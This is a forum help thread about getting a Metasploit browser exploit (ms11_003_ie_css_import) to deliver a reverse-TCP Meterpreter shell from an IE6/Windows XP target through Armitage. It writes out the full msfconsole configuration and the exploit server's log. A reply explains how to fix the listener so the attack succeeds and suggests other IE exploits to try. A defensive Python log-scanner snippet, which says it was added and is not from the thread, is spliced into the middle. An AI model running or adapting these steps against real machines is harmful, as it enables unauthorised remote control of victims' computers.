
Armitage/metasploit Help


tony1grendel


Hey, guys. I really hope somebody could help me out here.

I am running linux, Ubuntu 10.04

I have mysql installed and database msf3 configured.

I have the Metasploit framework installed.

I have armitage installed.

I run the msfrpc daemon: (with no SSL and type Basic)

sudo msfrpcd -f -U msf -P test -a 127.0.0.1 -t Basic -S

I get the following output:

[*] XMLRPC starting on 127.0.0.1:55553 (NO SSL):Basic...

[*] XMLRPC ready at 2011-09-02 13:20:16 -0500.

I assume everything is good here then I run gksudo armitage

Uncheck SSL and select mysql

I hit Connect, Armitage loads, and I do an nmap on my IP range. I see the target computer that I'm testing.

My target PC is a Dell, Pentium 4 Processor, running Windows XP Pro SP3 with IE6

Then I select exploit:

ms11_003_ie_css_import

I edit the following settings to the following values:

SRVPORT:80

URIPATH: /

*LPORT: 443

I put an asterisk by the last setting because I ran the exploit with the default port (I believe 4444), then with 443, and then again with 23.

Every time I changed the port number I terminated and restarted msfrpcd and Armitage.

Each time I get the same results (after the target browses to the IP address in IE6):

msf > use exploit/windows/browser/ms11_003_ie_css_import

msf > set SSLVersion SSL3

SSLVersion => SSL3

msf exploit(ms11_003_ie_css_import) > set LHOST 10.12.5.48

LHOST => 10.12.5.48

msf exploit(ms11_003_ie_css_import) > set DisablePayloadHandler true

DisablePayloadHandler => true

msf exploit(ms11_003_ie_css_import) > set LPORT 443

LPORT => 443

msf exploit(ms11_003_ie_css_import) > set SRVPORT 80

SRVPORT => 80

msf exploit(ms11_003_ie_css_import) > set SSL 0

SSL => 0

msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms11_003_ie_css_import) > set TARGET 0

TARGET => 0

msf exploit(ms11_003_ie_css_import) > set SRVHOST 0.0.0.0

SRVHOST => 0.0.0.0

msf exploit(ms11_003_ie_css_import) > set URIPATH /

URIPATH => /

msf exploit(ms11_003_ie_css_import) > set OBFUSCATE 1

OBFUSCATE => 1

msf exploit(ms11_003_ie_css_import) > exploit -j

[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://10.12.5.48:80/

[*] Server started.

[*] 10.12.5.114:2156 Received request for "/"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect

[*] 10.12.5.114:2156 Received request for "/C3QEIDn.html"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML

[*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL

[*] 10.12.5.114:2156 Received request for "/iexplore.exe.config"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

[*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

Everything runs except for the meterpreter session: I don't compromise my target and I don't get red lightning bolts surrounding the image of the target IP.

It seems like I'm doing everything that should be done. What am I doing wrong?

I changed the port numbers because I believe the network may be blocking certain ports. But 443 and 23 should work.


What happens if you type the IP address of your attacker's machine into your victim's web browser?


Sorry, I should have been more specific: the last lines appear when the attacker's IP is entered into the victim's browser.

Everything after "[*] Server started.":

[*] 10.12.5.114:2156 Received request for "/"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect

[*] 10.12.5.114:2156 Received request for "/C3QEIDn.html"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML

[*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL

[*] 10.12.5.114:2156 Received request for "/iexplore.exe.config"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

[*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80"

[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

All of that is what happens.

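A defender-side reading of the request sequence in the output above, added here as an example that is not from the thread, Armitage or Metasploit: it scans a constructed, simplified proxy log ("<client> <server> <path>", one request per line, an assumption about the format) and flags any client that fetches a DLL and then iexplore.exe.config from the same server, the part of the delivery chain a normal site has no reason to produce.

```python
import re
from collections import defaultdict

# Constructed sample log, one request per line: "<client> <server> <path>".
# The first five lines mirror the request order in the thread's Metasploit
# output; the last three are ordinary browsing used as a negative case.
SAMPLE_LOG = r"""
10.12.5.114 10.12.5.48 /
10.12.5.114 10.12.5.48 /C3QEIDn.html
10.12.5.114 10.12.5.48 /generic-1314988683.dll
10.12.5.114 10.12.5.48 /iexplore.exe.config
10.12.5.114 10.12.5.48 /\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80
10.12.5.20 198.51.100.10 /index.html
10.12.5.20 198.51.100.10 /app.dll
10.12.5.20 198.51.100.10 /style.css
"""

# Stages of the delivery chain in the order they appear in the thread.
STAGES = [
    ("html", re.compile(r"\.html$")),
    ("dotnet_dll", re.compile(r"\.dll$")),
    ("exe_config", re.compile(r"/iexplore\.exe\.config$")),
    ("css", re.compile(r"^/(\\x[0-9A-Fa-f]{2})+$")),  # escaped-byte path
]
# A DLL followed by an iexplore.exe.config fetch from the same server is the
# combination worth alerting on; the HTML and CSS stages alone are too generic.
REQUIRED = ("dotnet_dll", "exe_config")


def stages_per_pair(log_text):
    """Map (client, server) -> ordered list of chain stages observed."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) != 3:
            continue  # skip blank or malformed lines
        client, server, path = parts
        for name, pattern in STAGES:
            if pattern.search(path):
                seen[(client, server)].append(name)
                break
    return dict(seen)


def flag_suspects(log_text):
    """Return (client, server) pairs whose stages contain REQUIRED in order."""
    suspects = []
    for pair, stages in stages_per_pair(log_text).items():
        it = iter(stages)  # subsequence check: each REQUIRED stage, in order
        if all(any(s == want for s in it) for want in REQUIRED):
            suspects.append(pair)
    return suspects
```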

If you're launching this exploit through Armitage's module launcher, then beware that Armitage will try to configure the payload for you. By default, LPORT is set to some random value. You'll also notice that DisablePayloadHandler is set to true by default as well. Together, these values instruct Metasploit not to start a new payload handler when launching the attack and to instruct meterpreter to connect back to that random port number (which, by the way, isn't so random: Armitage has a meterpreter listener running there already). If you don't change LPORT and everything else is OK with the targeted environment, it'll work.

If you want to change LPORT, go ahead. Just be sure to set DisablePayloadHandler to false.

Optionally, double click the Payload option name (it'll have a thick cross next to it). This will open up a dialog to let you choose what kind of payload you want and whether a listener exists or should be started. This will update all of the payload related options at once and you can tweak from there.

(screenshot: configurepayload.png)

This is explained in the documentation too: http://www.fastandeasyhacking.com/manual

Now on to the exploit, be aware of a few things about this one:

(1) ms11_003_ie_css_import does not like to be served over SSL. In my experience you won't get code execution when this happens.

(2) ms11_003_ie_css_import requires that .NET 2.0 is installed on the target machine (necessary for the exploit).

(3) The exploit does not trigger twice. If you use it, you have to reboot before you try it again.

Since you're going after IE6, this exploit is not what I would use. I recommend trying ie_createobject or the ms10_002_aurora exploit.

Good luck.
